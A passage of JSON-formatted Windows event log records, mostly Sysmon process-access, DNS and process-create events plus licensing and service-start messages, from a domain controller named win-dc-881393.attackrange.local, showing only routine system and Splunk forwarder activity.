05:48:47.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3736,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":3737,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.831\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nProcessId: 2440\r\nQueryName: WIN-DC-881393\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\spoolsv.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.831","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001076B50200}","QueryName":"WIN-DC-881393","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\spoolsv.exe","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":3738,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.982\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nProcessId: 2440\r\nQueryName: WIN-DC-881393\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Windows\\System32\\spoolsv.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.982","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001076B50200}","QueryName":"WIN-DC-881393","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Windows\\System32\\spoolsv.exe","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":3739,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.982\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nProcessId: 2440\r\nQueryName: WIN-DC-881393\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;\r\nImage: C:\\Windows\\System32\\spoolsv.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.982","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001076B50200}","QueryName":"WIN-DC-881393","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;","Image":"C:\\Windows\\System32\\spoolsv.exe","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1066,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12118,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"Initialization status for service objects.\r\nC:\\Windows\\system32\\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000\n","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1003,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12119,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service has completed licensing status check.\r\nApplication Id=55c92734-d682-4d71-983e-d6ec3f16059f\r\nLicensing Status=\n1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259191)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )]\n2: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n3: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n4: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n5: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n6: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n7: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n8: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n9: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n10: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n11: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n12: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n13: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n\n","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":902,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12120,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service has started.\r\n10.0.14393.3541","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76846,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The SplunkForwarder Service service entered the running state.","param1":"SplunkForwarder Service","param2":"running","EventReceivedTime":"2020-08-01 05:48:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3740,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.845\r\nProcessGuid: {A837DB8D-0240-5F25-0000-00107DA50500}\r\nProcessId: 3916\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.845","ProcessGuid":"{A837DB8D-0240-5F25-0000-00107DA50500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3741,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0240-5F25-0000-00107DA50500}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0240-5F25-0000-00107DA50500}","TargetProcessId":"3916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3742,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0240-5F25-0000-00107DA50500}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0240-5F25-0000-00107DA50500}","TargetProcessId":"3916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3743,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
